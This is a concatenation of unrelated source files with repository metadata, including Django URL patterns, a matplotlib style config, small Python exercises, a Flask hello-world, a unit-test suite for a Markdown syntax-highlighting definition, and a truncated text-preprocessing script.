regex=r'^products/(?P<pk>\d+)/$',
view=views.ProductDetail.as_view(),
name='product-detail'
),
url(
regex=r'^products/(?P<pk>\d+)/like/$',
view=views.ProductLike.as_view(),
name='product-like'
),
url(
regex=r'^categories/$',
view=views.CategoryList.as_view(),
name='category-list'
),
url(
regex=r'^categories/(?P<pk>\d+)/$',
view=views.CategoryDetail.as_view(),
name='category-detail'
),
]
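# Usage sketch (assumption: these patterns are mounted from the project's
# root urls.py; the 'api/' prefix here is hypothetical):
#
#   from django.conf.urls import include, url
#   urlpatterns = [url(r'^api/', include('nicolock.products.rest_urls'))]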
|
[
"brennen@lightningkite.com"
] |
brennen@lightningkite.com
|
7cb0f559cf1a4f0d1a677006477fa65e55752236
|
b1e9991736e1fe83d3886dcb5c860dc94a31af2b
|
/matplotlibrc.py
|
dbebae19a11784998b797d88525705478349e408
|
[] |
no_license
|
bbw7561135/TurbulentDynamo
|
e98748171aff47cf3ec75db3b98e0b2c8dbdf280
|
cba1e7a06ea9434ff3d8d3f9e8482677b0274c2f
|
refs/heads/master
| 2022-12-25T03:37:12.973978
| 2020-08-31T01:11:24
| 2020-08-31T01:11:24
| 294,576,179
| 2
| 1
| null | 2020-09-11T02:42:17
| 2020-09-11T02:42:16
| null |
UTF-8
|
Python
| false
| false
| 1,166
|
py
|
from matplotlib import rcParams
# rcParams.keys()
rcParams['text.usetex'] = True
rcParams['text.latex.preamble'] = r'\usepackage{bm}'
rcParams['lines.linewidth'] = 1.2
rcParams['font.family'] = 'Arial'
rcParams['font.size'] = 15
rcParams['axes.linewidth'] = 0.8
rcParams['xtick.top'] = True
rcParams['xtick.direction'] = 'in'
rcParams['xtick.minor.visible'] = True
rcParams['xtick.major.size'] = 6
rcParams['xtick.minor.size'] = 3
rcParams['xtick.major.width'] = 0.75
rcParams['xtick.minor.width'] = 0.75
rcParams['xtick.major.pad'] = 5
rcParams['xtick.minor.pad'] = 5
rcParams['ytick.right'] = True
rcParams['ytick.direction'] = 'in'
rcParams['ytick.minor.visible'] = True
rcParams['ytick.major.size'] = 6
rcParams['ytick.minor.size'] = 3
rcParams['ytick.major.width'] = 0.75
rcParams['ytick.minor.width'] = 0.75
rcParams['ytick.major.pad'] = 5
rcParams['ytick.minor.pad'] = 5
rcParams['legend.fontsize'] = 15
rcParams['legend.labelspacing'] = 0.2
rcParams['legend.loc'] = 'upper left'
rcParams['legend.frameon'] = False
rcParams['figure.figsize'] = (8.0, 5.0)
rcParams['figure.dpi'] = 200
rcParams['savefig.dpi'] = 200
rcParams['savefig.bbox'] = 'tight'
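# Usage sketch (assumption: this module is meant to be imported for its side
# effects): import it once before plotting so every subsequent figure picks
# up the rcParams set above.
#
#   import matplotlibrc
#   import matplotlib.pyplot as plt
#   plt.plot([0, 1], [0, 1])  # drawn with the settings above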
|
[
"necokriel@gmail.com"
] |
necokriel@gmail.com
|
7ed42131d1dea6425f48f5cd8d6a580ebe0e2de1
|
8d150f92db0e12dcb32791892c0747ee50194cbb
|
/ex_01.py
|
120378ee94c80dc0412ae742805442adf5f209f5
|
[] |
no_license
|
wangbingde/class_day02
|
cbe1302668aa1cfe6b6a715ede149854627dc3ea
|
215cd1abb15bb31b70c62e344fe7e611a79a75b1
|
refs/heads/master
| 2020-04-07T07:10:59.613331
| 2018-11-19T05:33:51
| 2018-11-19T05:33:51
| 158,167,125
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
# Single inheritance
class Animal:
    def eat(self):
        print("吃")  # "eat"
    def drink(self):
        print("喝")  # "drink"
    def run(self):
        print("跑")  # "run"
    def sleep(self):
        print("睡--")  # "sleep--"
class Dog(Animal):
    def bark(self):
        print("汪汪叫")  # "woof woof"
class XiaoTian(Dog):
    def fly(self):
        print("会飞")  # "can fly"
wangcai = Dog()
wangcai.sleep()
wangcai.bark()
xiao = XiaoTian()
xiao.bark()
xiao.fly()
|
[
"1254817017@qq.com"
] |
1254817017@qq.com
|
2864f464a2a9b812262b8d20279d25c2d4d19566
|
e75d2b20e7afade2c9778ab5b68369d482cb9fd0
|
/Desafio007.py
|
d957e19b9877e2391eabb33cd577d0d1a74e3f22
|
[] |
no_license
|
tamaragmnunes/Exerc-cios-extra---curso-python
|
e09bb6e507e0b1c5a3f84ecec7dbb25b8aaf27f4
|
5bfd2674101f2f41001adcf3b65414b3ef6b57ba
|
refs/heads/master
| 2020-07-26T09:10:54.536729
| 2019-09-15T13:45:06
| 2019-09-15T13:45:06
| 208,599,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
#Develop a program that reads a student's two grades, then calculates and shows the average
n1 = float(input('Digite a primeira nota: '))  # "Enter the first grade: "
n2 = float(input('Digite a segunda nota: '))  # "Enter the second grade: "
m = (n1 + n2) / 2
print('A sua média é {}'.format(m))  # "Your average is {}"
|
[
"noreply@github.com"
] |
tamaragmnunes.noreply@github.com
|
d3527c75633bd397f54893cab6262bed50e53879
|
d17d65a3ee48b307a46a0b95a05f04131668edbe
|
/TestSuite/runner.py
|
6a172fc2702d50f5b6f0558a2beab1d4f677a319
|
[] |
no_license
|
qlcfj001/ui_test
|
28fa370a6f912b2ff9a551c681d35a452c57ee02
|
25020af19d84c9c2b1bad02aca89cc881e828bbb
|
refs/heads/master
| 2023-06-15T18:10:02.177702
| 2021-07-15T06:35:10
| 2021-07-15T06:35:10
| 386,012,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
from Page.Base import base
from pageobjct.SearcH import Searchpage
from selenium.webdriver.common.by import By
#from TestSuite.Variablelayer.Variable import *
import time
import unittest
leave='成都'
leave_data="2021-07-20"
arrive='北京'
arrive_data='2021-07-30'
aa = Searchpage()
aa.search7(leave=leave, leave_data=leave_data, arrive=arrive, arrive_data=arrive_data)
|
[
"you@example.com"
] |
you@example.com
|
7355b8d086777562985e5de5563d15a37060c3e1
|
940b69579fdd126d254020469bbe54e553f8d7ea
|
/tests/test_markdown_light.py
|
0721fce994eb753acb8fe43a962d73ad7bb3ca13
|
[
"MIT"
] |
permissive
|
nvtkaszpir/MarkdownLight
|
9edca79dc5fb513cfa6ab3aae52b5ab4e7360b91
|
38ad22267aa7b6327e39564f7c6c864104353e21
|
refs/heads/master
| 2021-01-18T10:45:31.864370
| 2015-03-27T15:51:00
| 2015-03-27T15:57:35
| 32,994,951
| 2
| 0
| null | 2015-03-27T15:48:46
| 2015-03-27T15:48:46
|
Python
|
UTF-8
|
Python
| false
| false
| 22,066
|
py
|
import syntax_test
class TestMarkdownLight(syntax_test.SyntaxTestCase):
def setUp(self):
super().setUp()
self.set_syntax_file("Packages/MarkdownLight/MarkdownLight.tmLanguage")
def check_default(self, patterns):
self.check_in_single_scope(patterns, 'text')
def test_simple_text(self):
self.set_text('A B C')
self.check_default('A B C')
def test_italic(self):
self.set_text('''
A *B* _C_ D
*E*
''')
self.check_eq_scope([ r'\*B\*', '_C_', r'\*E\*' ], 'markup.italic')
self.check_eq_scope(r'[\*_]', 'punctuation.definition')
self.check_default(list('AD '))
def test_bold(self):
self.set_text('''
A **B** __C__ D
**E**
''')
self.check_eq_scope([ r'\*\*B\*\*', r'__C__', r'\*\*E\*\*' ], 'markup.bold')
self.check_eq_scope(r'[\*_]+', 'punctuation.definition')
self.check_default(list('AD '))
def test_inline_markup_inside_inline_markup(self):
self.set_text('''
A *B **C** D* E
F **G *H* I** J
''')
self.check_eq_scope(r'\*B \*\*C\*\* D\*', 'markup.italic')
self.check_eq_scope(r'\*H\*', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
self.check_eq_scope(r'\*\*G \*H\* I\*\*', 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(list('AEFJ'))
def test_bold_italic(self):
self.set_text('''
AA *__AB__* AC
BA _**BB**_ BC
CA **_CB_** CC
DA __*DB*__ DC
EA ***EB*** EC
FA ___FB___ FC
''')
self.check_eq_scope(r'\*__AB__\*', 'markup.italic')
self.check_eq_scope(r'_\*\*BB\*\*_', 'markup.italic')
self.check_eq_scope([ '_CB_', r'\*DB\*' ], 'markup.italic')
self.check_eq_scope([ '__AB__', r'\*\*BB\*\*' ], 'markup.bold')
self.check_eq_scope(r'\*\*_CB_\*\*', 'markup.bold')
self.check_eq_scope(r'__\*DB\*__', 'markup.bold')
self.check_eq_scope(r'\*+|_+', 'punctuation.definition')
self.check_eq_scope(r'\*\*\*EB\*\*\*', 'markup.bold')
self.check_eq_scope(r'\*\*\*EB\*\*\*', 'markup.italic')
self.check_eq_scope(r'___FB___', 'markup.bold')
self.check_eq_scope(r'___FB___', 'markup.italic')
self.check_default([ r'[A-Z]A ', r' [A-Z]C\n' ])
def test_multiline_markup_not_supported(self):
# Multiline inline markup is not supported due to
# limitations in syntax definition language.
self.set_text('''
A **B
C** D
E _F
G_ H
''')
self.check_default('.+')
def test_inline_markup_before_punctuation(self):
self.set_text('''
A *B*: *C*; *D*, *E*. *F*? G
K **L**: **M**; **N**, **O**. **P**? Q
''')
self.check_eq_scope([
r'\*B\*', r'\*C\*', r'\*D\*', r'\*E\*', r'\*F\*'
], 'markup.italic')
self.check_eq_scope([
r'\*\*L\*\*', r'\*\*M\*\*', r'\*\*N\*\*',
r'\*\*O\*\*', r'\*\*P\*\*'
], 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r'[AGKQ:;,\.?]')
def test_inline_markup_inside_quotes_and_brackets(self):
self.set_text('''
A "*B*" (*C*) '*D*' E
K "**L**" (**M**) '**N**' O
''')
self.check_eq_scope([ r'\*B\*', r'\*C\*', r'\*D\*' ], 'markup.italic')
self.check_eq_scope([ r'\*\*L\*\*', r'\*\*M\*\*', r'\*\*N\*\*' ], 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r'''[AEKQ"\(\)'\.]''')
def test_inline_markup_outside_quotes_and_brackets(self):
self.set_text('''
*"A"* *(B)* *'C'*
**"D"** **(E)** **'F'**
*"A";* *(B).* *'C':*
**"D"!** **(E)?** **'F',**
Z
''')
self.check_eq_scope([ r'\*"A"\*', r'\*\(B\)\*', r"\*'C'\*" ], 'markup.italic')
self.check_eq_scope([ r'\*\*"D"\*\*', r'\*\*\(E\)\*\*', r"\*\*'F'\*\*" ], 'markup.bold')
self.check_eq_scope([ r'\*"A";\*', r'\*\(B\)\.\*', r"\*'C':\*" ], 'markup.italic')
self.check_eq_scope([ r'\*\*"D"!\*\*', r'\*\*\(E\)\?\*\*', r"\*\*'F',\*\*" ], 'markup.bold')
self.check_default('Z')
def test_brackets_inside_inline_markup(self):
self.set_text('''
*A (B C)*: D
*(K)* **(L)**
''')
self.check_eq_scope([ r'\*A \(B C\)\*', r'\*\(K\)\*' ] , 'markup.italic')
self.check_eq_scope( r'\*\*\(L\)\*\*', 'markup.bold')
self.check_eq_scope(r'\*+', 'punctuation.definition')
self.check_default(r': D')
def test_inline_markup_combinations(self):
self.set_text('_A _ B_C D_E _ F_ *G* **H** <a>_I_</a>')
self.check_eq_scope([ '_A _ B_C D_E _ F_',
r'\*G\*', '_I_' ], 'markup.italic')
self.check_eq_scope(r'\*\*H\*\*', 'markup.bold')
def test_escaping_of_inline_punctuation(self):
self.set_text(r'A *\*B\** C **D\*** E')
self.check_eq_scope(r'\*\\\*B\\\*\*', 'markup.italic')
self.check_eq_scope(r'\*\*D\\\*\*\*', 'markup.bold')
self.check_default(list('ACE '))
def test_inline_markup_does_not_work_inside_words(self):
self.set_text('A_B C_D_E')
self.check_default('.+')
def test_inline_markup_does_not_work_without_text(self):
self.set_text('''
A ____ B
''')
self.check_default('^.+$')
def test_valid_ampersands(self):
self.set_text('''
&
&&
A & B
A && B
& A &B && C &&D E& F&&
&G;
''')
self.check_no_scope('^.+$', 'invalid')
def test_valid_brackets(self):
self.set_text('''
<
<<
A < B
A << B
A<
A<<
''')
self.check_no_scope('^.+$', 'invalid')
def test_headings(self):
self.set_text('''
# A
## B
### C
#### D
##### E
###### F
G
#K
##L#
### M ##
#### N ###########
O
''')
self.check_eq_scope(list('ABCDEFKLMN'), 'entity.name.section')
self.check_in_scope(list('ABCDEFKLMN# '), 'markup.heading')
self.check_eq_scope(r'#+', 'punctuation.definition')
self.check_default(list('GO'))
def test_setext_headings(self):
self.set_text('''
A
===
B
---
C
D
=======
E
F
-------
Z
''')
self.check_eq_scope('=+', 'markup.heading.1')
self.check_eq_scope('-+', 'markup.heading.2')
self.check_default(r'\w+')
def test_not_setext_headings(self):
self.set_text('''
- A
===
> B
---
C
=======
D
--
E
- - -
-------
-------
========
Z
''')
self.check_no_scope('.+', 'markup.heading')
def test_inline_markup_inside_headings(self):
self.set_text('''
#_A_
## B _C_
### D _E_ F
#### K _L M_ N #
Z
''')
self.check_eq_scope([
'_A_', 'B _C_', 'D _E_ F', 'K _L M_ N'
], 'entity.name.section')
self.check_in_scope(list('ABCDEFKLMN#_ '), 'markup.heading')
self.check_eq_scope([ '_A_', '_C_', '_E_', '_L M_' ], 'markup.italic')
self.check_eq_scope(r'#+', 'punctuation.definition')
self.check_default(r'Z')
def test_fenced_paragraph(self):
self.set_text('''
K
```
A
```
L
''')
self.check_eq_scope(r'```\nA\n```\n', 'markup.raw.block.fenced')
self.check_eq_scope('`+', 'punctuation.definition')
self.check_default([ r'K\n\n', r'\nL\n' ])
def test_fenced_block_inside_paragraph(self):
self.set_text('''
K
```
A
```
L
''')
self.check_eq_scope(r'```\nA\n```\n', 'markup.raw.block.fenced')
self.check_eq_scope('`+', 'punctuation.definition')
self.check_default([ r'\nK\n', r'L\n\n' ])
def test_syntax_highlighting_inside_fenced_blocks(self):
self.set_text('''
``` c++
int x = 123;
```
```python
def g():
return 567
```
''')
self.check_eq_scope([ 'int', 'def' ], 'storage.type')
self.check_eq_scope([ '123', '567' ], 'constant.numeric')
self.check_eq_scope('g', 'entity.name')
self.check_eq_scope('return', 'keyword.control')
def test_indented_raw_blocks(self):
self.set_text('''
A
B
C
''')
self.check_eq_scope(r' B\n', 'markup.raw.block')
self.check_default([ r'\nA\n\n', r'\nC\n' ])
def test_multiline_indented_raw_blocks(self):
self.set_text('''
A
B
''')
self.check_eq_scope(r' A\n B\n', 'markup.raw.block')
def test_indented_raw_blocks_glued_to_text(self):
self.set_text('''
A
B
C
D
''')
self.check_eq_scope(r' C\n', 'markup.raw.block')
self.check_default([ r'\nA\n B\n\n', r'D\n' ])
def test_blank_line_is_not_indented_raw_block(self):
self.set_text('\n\n \n\n')
self.check_default(r'\n[ ]+\n')
def test_inline_raw_text(self):
self.set_text('''
A `B` C
D`E`F
K `L **M` N** O
''')
self.check_eq_scope(list('BE') + [ r'L \*\*M' ], 'markup.raw.inline.content')
self.check_eq_scope('`', 'punctuation.definition')
self.check_default(list('ACDFK') + [ r' N\*\* O' ])
def test_incomplete_or_multiline_inline_raw_text(self):
self.set_text('''
A `B
C` D
''')
self.check_default('.+')
def test_multiple_backquotes_as_inline_raw_delimiters(self):
self.set_text('''
``A``
```B``
``C```
''')
self.check_eq_scope(list('AC'), 'markup.raw.inline.content')
self.check_eq_scope('`B', 'markup.raw.inline.content')
self.check_eq_scope([ r'^``', r'(?<=\w)``' ], 'punctuation.definition')
self.check_default([ r'(?<=C``)`', r'\n' ])
def test_inline_raw_delimiters_do_not_start_fenced_block(self):
self.set_text('''
```A```
B
''')
self.check_eq_scope('```A```', 'markup.raw.inline.markdown')
self.check_eq_scope('A', 'markup.raw.inline.content')
self.check_eq_scope('```', 'punctuation.definition')
self.check_default(r'B')
def test_quoted_text_alone(self):
self.set_text('>A\n')
self.check_eq_scope(r'>A\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
def test_one_line_quoted_block(self):
self.set_text('''
>A
B
''')
self.check_eq_scope(r'>A\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nB\n')
def test_type_1_multiline_quoted_block(self):
self.set_text('''
>A
B
C
''')
self.check_eq_scope(r'>A\nB\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_type_2_multiline_quoted_block(self):
self.set_text('''
>A
>B
C
''')
self.check_eq_scope(r'>A\n>B\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_quoted_block_inside_paragraph(self):
self.set_text('''
A
>B
C
''')
self.check_eq_scope(r'>B\n', 'markup.quote')
self.check_default([ r'\nA\n', r'\nC\n' ])
def test_spaces_before_and_after_quote_signs(self):
self.set_text('''
> A
> B
> C
D
''')
self.check_eq_scope(r' > A\n {2}> {2}B\n {3}> {3}C\n', 'markup.quote')
self.check_eq_scope(r'>', 'punctuation.definition')
self.check_default(r'\nD\n')
def test_inline_markup_inside_quoted_text(self):
self.set_text('''
> `A`
> _B_
> **C**
''')
self.check_eq_scope('`A`', 'markup.raw.inline.markdown')
self.check_eq_scope('_B_', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
def test_list_item_alone(self):
self.set_text(
'''- A
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r'-', 'punctuation.definition')
def test_multiline_list(self):
self.set_text('''
- A
- B
C
''')
self.check_eq_scope(r'- A\n- B\n', 'meta.paragraph.list')
self.check_eq_scope(r'-', 'punctuation.definition')
self.check_default(r'\nC\n')
def test_different_types_of_unnumbered_list_bullets(self):
self.set_text('''
- A
+ B
* C
D
''')
self.check_eq_scope(r'- A\n\+ B\n\* C\n', 'meta.paragraph.list')
self.check_eq_scope([ r'\+', r'\*', '-' ], 'punctuation.definition')
self.check_default(r'D')
def test_numbered_list(self):
self.set_text('''
0. A
1. B
12345. C
D
''')
self.check_eq_scope(r'0\. A\n1\. B\n\d+\. C\n', 'meta.paragraph.list')
        self.check_eq_scope([ r'0\.', r'1\.', r'12345\.' ], 'punctuation.definition')
self.check_default(r'D')
def test_nested_lists(self):
self.set_text('''
- A
* B
+ C
1. D
2. E
Z
''')
self.check_eq_scope(r'- A\n \* B\n \+ C\n +1\. D\n2\. E\n', 'meta.paragraph.list')
self.check_eq_scope([ '-', r'\*', r'\+', r'1\.', r'2\.' ], 'punctuation.definition')
self.check_default('Z')
def test_spaces_after_bullet(self):
self.set_text('''
-A
- B
- C
Z
''')
self.check_eq_scope(r'- B\n- +C\n', 'meta.paragraph.list')
self.check_eq_scope([ r'-(?= B)', r'-(?= +C)' ], 'punctuation.definition')
self.check_default('Z')
def test_list_inside_paragraph(self):
self.set_text('''
A
- B
''')
self.check_eq_scope(r'- B\n', 'meta.paragraph.list')
self.check_default(r'\nA\n')
def test_inline_markup_inside_list_items(self):
self.set_text('''
- `A`
- _B_
- **C**
''')
self.check_in_scope(r'-.*$\n', 'meta.paragraph.list')
self.check_eq_scope('`A`', 'markup.raw.inline.markdown')
self.check_eq_scope('_B_', 'markup.italic')
self.check_eq_scope(r'\*\*C\*\*', 'markup.bold')
def test_multiline_list_items(self):
self.set_text('''
- A
B
- C
D
Z
''')
self.check_eq_scope(r' - A\n B\n - C\nD\n', 'meta.paragraph.list')
self.check_default('Z')
def test_multiline_list_item_with_paragraph(self):
self.set_text('''
- A
B
C
- D
E
F
Z
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r' B\nC\n- D\n', 'meta.paragraph.list')
self.check_eq_scope(r' E\nF\n', 'meta.paragraph.list')
self.check_default('Z')
def test_4_spaces_in_multiline_list_item(self):
self.set_text('''
- A
B
C
- D
E
F
Z
''')
self.check_eq_scope(r'- A\n {4}B\n {4}C\n', 'meta.paragraph.list')
self.check_eq_scope(r'- D\n', 'meta.paragraph.list')
self.check_eq_scope(r' {4}E\n {4}F\n', 'meta.paragraph.list')
self.check_default('Z')
def test_4_spaces_before_nested_list_items(self):
self.set_text('''
- A
- B
- C
Z
''')
self.check_eq_scope(r'- A\n {4}- B\n {8}- C\n', 'meta.paragraph.list')
self.check_default('Z')
def test_fenced_block_is_not_part_of_a_list_item(self):
self.set_text('''
- A
```
B
```
Z
''')
self.check_eq_scope(r'- A\n', 'meta.paragraph.list')
self.check_eq_scope(r'```\nB\b\n```\n', 'markup.raw.block.fenced')
self.check_default('Z')
def test_inline_links(self):
self.set_text('''
[A](B)
[C] (D)
[E](F "G")

![C] (D)

Z
''')
self.check_eq_scope([
r'^\[A\]\(B\)',
r'^\[C\]\s+\(D\)',
r'^\[E\]\(F "G"\)'
], 'meta.link.inline')
self.check_eq_scope([
r'^!\[A\]\(B\)',
r'^!\[C\]\s+\(D\)',
r'^!\[E\]\(F "G"\)'
], 'meta.image.inline')
self.check_eq_scope(list('ACE'), 'string.other.link.title')
self.check_eq_scope(list('BDF'), 'markup.underline.link')
self.check_eq_scope('G', 'string.other.link.description.title')
self.check_eq_scope([ r'!', r'\[', r'\]' ], 'punctuation.definition')
self.check_default('Z')
def test_reference_links(self):
self.set_text('''
[A][B]
[C] [D]
![E][F]
![G] [H]
Z
''')
self.check_eq_scope(r'\[A\]\[B\]', 'meta.link.reference')
self.check_eq_scope(r'\[C\]\s+\[D\]', 'meta.link.reference')
self.check_eq_scope(r'!\[E\]\[F\]', 'meta.image.reference')
self.check_eq_scope(r'!\[G\]\s+\[H\]', 'meta.image.reference')
self.check_eq_scope(list('ACEG'), 'string.other.link.title')
self.check_eq_scope(list('BDFH'), 'constant.other.reference.link')
self.check_eq_scope([ r'!', r'\[', r'\]' ], 'punctuation.definition')
self.check_default('Z')
def test_implicit_links(self):
self.set_text('''
[A][]
[B] []
![C][]
![D] []
Z
''')
self.check_eq_scope([ r'\[A\]\[\]', r'\[B\] \[\]' ],
'meta.link.reference')
self.check_eq_scope([ r'!\[C\]\[\]', r'!\[D\] \[\]' ],
'meta.image.reference')
self.check_eq_scope(list('ABCD'), 'constant.other.reference.link')
self.check_eq_scope(r'[!\[\]]', 'punctuation.definition')
self.check_default('Z')
def test_multiline_links_not_supported(self):
self.set_text('''
[A
B](C)
[D
E][F]

![D
E][F]
''')
self.check_default('.+')
def test_inline_markup_inside_links(self):
self.set_text('''
[__A__](B)
[_C_][D]

![_G_][H]
Z
''')
self.check_eq_scope(r'\[__A__\]\(B\)', 'meta.link.inline')
self.check_eq_scope(r'\[_C_\]\[D\]', 'meta.link.reference')
self.check_eq_scope(r'!\[__E__\]\(F\)', 'meta.image.inline')
self.check_eq_scope(r'!\[_G_\]\[H\]', 'meta.image.reference')
self.check_eq_scope([ '__A__', '__E__' ], 'markup.bold')
self.check_eq_scope([ '_C_', '_G_' ], 'markup.italic')
self.check_default('Z')
def test_inline_markup_outside_links(self):
self.set_text('''
**[A](X)**
__[B][X]__
**
_![D][X]_
Z
''')
self.check_eq_scope(r'\*\*\[A\]\(X\)\*\*', 'markup.bold')
self.check_eq_scope(r'__\[B\]\[X\]__', 'markup.bold')
self.check_eq_scope(r'\*!\[C\]\(X\)\*', 'markup.italic')
self.check_eq_scope(r'_!\[D\]\[X\]_', 'markup.italic')
self.check_default('Z')
def test_references(self):
self.set_text('''
[A]: B "C"
[D]:<E> 'F'
[K]: L (M)
[N]: O
Z
''')
self.check_eq_scope(r'\[.*?(?=\s*$)', 'meta.link.reference.def')
self.check_eq_scope(r'''[\[\]:'"()]''', 'punctuation')
self.check_eq_scope(list('ADKN'), 'constant.other.reference.link')
self.check_eq_scope(list('BELO'), 'markup.underline.link')
self.check_eq_scope(list('CFM'), 'string.other.link.description.title')
self.check_default('Z')
def test_supported_urls(self):
self.set_text('''
http://A.B
https://C.D
ftp://E.F
http://H.I.J
http://K.L/
http://M.N/O?P=Q&R=S
http://Q.W:123
http://Q.W.E:123/
Z
''')
self.check_eq_scope(r'^.+://.+$', 'markup.underline.link')
self.check_eq_scope(r'^.+://.+$', 'meta.link.inet')
self.check_default('Z')
def test_unsupported_urls(self):
self.set_text('''
http://A
http://A:80
http://A:80.C
ssh://B.C
http://D/E
http://A?B.C
''')
self.check_default('.+')
def test_urls_in_brackes(self):
self.set_text('''
<http://A.B>
<https://C.D>
<ftp://E.F>
<http://H.I.J>
<http://K.L/>
<http://M.N/O?P=Q&R=S>
<http://Q.W:123>
<http://Q.W.E:123/>
Z
''')
self.check_eq_scope(r'http://A\.B', 'markup.underline.link')
self.check_eq_scope(r'^.+://.+$', 'meta.link.inet')
self.check_eq_scope(r'[<>]', 'punctuation.definition')
self.check_default('Z')
def test_emails(self):
self.set_text('''
<A@B.C>
<mailto:D@E.F>
O@P.Q
mailto:R@S.T
Z
''')
self.check_eq_scope(r'A@B.C', 'markup.underline.link')
self.check_eq_scope(r'mailto:R@S.T', 'markup.underline.link')
self.check_eq_scope(r'[^\s@]+@\S+', 'meta.link.email')
self.check_eq_scope(r'[<>]', 'punctuation.definition')
self.check_default('Z')
def test_strikethrough(self):
self.set_text('''
A ~~B~~ ~~C D~~ E
''')
self.check_eq_scope([ '~~B~~', '~~C D~~' ], 'markup.strikethrough')
self.check_eq_scope('~~', 'punctuation.definition.strikethrough')
self.check_default(list('AE'))
def test_unsupported_strikethrough(self):
self.set_text('''
~~A
B~~
~~ C~~
~~D ~~
E~~F~~
''')
self.check_default('.+')
def test_strikethrough_with_bold_italic(self):
self.set_text('''
*__~~A~~__*
*~~__B__~~*
~~*__C__*~~
___~~D~~___
~~___E___~~
Z
''')
self.check_eq_scope([
r'~~A~~', r'~~__B__~~', r'~~\*__C__\*~~',
r'~~D~~', r'~~___E___~~'
], 'markup.strikethrough')
self.check_eq_scope([
r'__~~A~~__', r'__B__', r'__C__',
r'___~~D~~___', r'___E___'
], 'markup.bold')
self.check_eq_scope([
r'\*__~~A~~__\*', r'\*~~__B__~~\*', r'\*__C__\*',
r'___~~D~~___', r'___E___'
], 'markup.italic')
self.check_eq_scope(r'~+|_+|\*+', 'punctuation.definition')
self.check_default('Z')
def test_html_tags(self):
self.set_text('''
A<br>
<li>B
<a href="http://C.D">E</a>
''')
self.check_default([ r'\nA', r'\n', r'B\n', 'E' ])
self.check_eq_scope([ '<br>', '<li>',
'<a href="http://C.D">', '</a>' ],
'meta.tag')
def test_block_tags_turn_off_markdown_markup(self):
self.set_text('''
<p>
*A* ~~B~~ __C__
</p>
<div>*D* ~~E~~ __F__</div>
''')
self.check_no_scope(list('ABCDEF'), 'markup')
def test_inline_markup_combined_with_html(self):
self.set_text('<a>_A_</a>')
self.check_eq_scope('_A_', 'markup.italic')
self.check_eq_scope([ '<a>', '</a>' ], 'meta.tag')
    def test_horizontal_lines(self):
self.set_text('''
***
* * *
___
__ __ __
- - -
----------------
---_---
Z
''')
self.check_eq_scope([
r'\*\*\*\n',
r'\* \* \*\n',
r'___\n',
r' __ __ __\n',
r' - - - \n',
r' -----+ +\n'
], 'meta.separator')
self.check_default(['---_---', 'Z'])
    def test_horizontal_lines_break_paragraphs(self):
self.set_text('''
A
- - -
Z
''')
self.check_eq_scope('- - -\n', 'meta.separator')
self.check_default(['A', 'Z'])
|
[
"sekogan@gmail.com"
] |
sekogan@gmail.com
|
fee23db67ca1b01428550a6fd45ebdf1149b381a
|
19a86ab59d3ab02103a0b12c2cb4eebdcf028679
|
/app.py
|
40f11fd05d7032f13ce823d7e818a763ff66e0a8
|
[] |
no_license
|
npvandyke/surfs_up
|
e5acee499baa6a51b4bf19d9ee6d551de8ac1a70
|
e9f5a59db7aec07a9e756a105a54f539dee6f04b
|
refs/heads/main
| 2023-03-29T17:48:34.057067
| 2021-04-01T22:11:33
| 2021-04-01T22:11:33
| 350,831,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
# Import dependency
from flask import Flask
# Create a new Flask app instance
app = Flask(__name__)
# Define the starting point (root) of the first route
@app.route('/')
def hello_world():
return 'Hello world'
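# Local run sketch (an added note, not part of the original file): the standard
# Flask entry point below serves the route above at http://127.0.0.1:5000/ when
# the script is executed directly.
if __name__ == '__main__':
    app.run()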
|
[
"npcolletti@gmail.com"
] |
npcolletti@gmail.com
|
b7c9571822e30c675a4bbb00ce1a6faff3a0bc1f
|
7274ce2b75d49a90c57e9220756bc9beb532c9e1
|
/preprocess/main_newsgroup_preprocess.py
|
36536c615b9bbfb43c48daa740c439bcd3c1effb
|
[] |
no_license
|
chauncyzhu/textclassification
|
4eb03f2b11abd67680daab24f373971ce33d89cd
|
0b3960f748ba66278250132d8b16d189cabe4a3f
|
refs/heads/master
| 2021-01-19T08:59:13.889878
| 2018-03-10T05:38:19
| 2018-03-10T05:38:19
| 87,704,238
| 2
| 0
| null | null | null | null |
GB18030
|
Python
| false
| false
| 3,853
|
py
|
# coding=gbk
import preprocess.data_clean.newsgroup.import_data as id
import preprocess.data_clean.newsgroup.clean_data as cd
import utils.newsgroup_path as path
import preprocess.transfer_vector.voca_dict.voca_data as vd # parts shared across corpora
import preprocess.transfer_vector.generate_vector.feature as feature
import preprocess.transfer_vector.generate_vector.transfer_vector as tv
"""
Driver functions; the code below processes the 20newsgroup corpus.
"""
CONFIRM_POS_CLASS = 0 # index of the designated positive class for binary classification
# Data cleaning and vocabulary building; class_num differs for multi-class vs. binary classification
def __voca_dict(class_num,voca_csv=None):
    # read the data and convert it to a DataFrame
    #pd_train, pd_test = id.getTrainAndTest(path.SOURCEFILE) # use this if the train and test sets must be split from a single source file
pd_train = id.getPDData(path.TRAIN_TEXT)
pd_test = id.getPDData(path.TEST_TEXT)
    cd.clean_data(pd_train) # tokenize (additional cleaning can be done here if needed)
cd.clean_data(pd_test)
    # Build the class vocabulary: class_num > 2 for multi-class, class_num = 2 for binary classification
    # pd_train = pd_train.head(100) # limit the size of the training set
    voca_dict = vd.getRelativeValue(pd_train, vd.getUniqueVocabulary(pd_train),
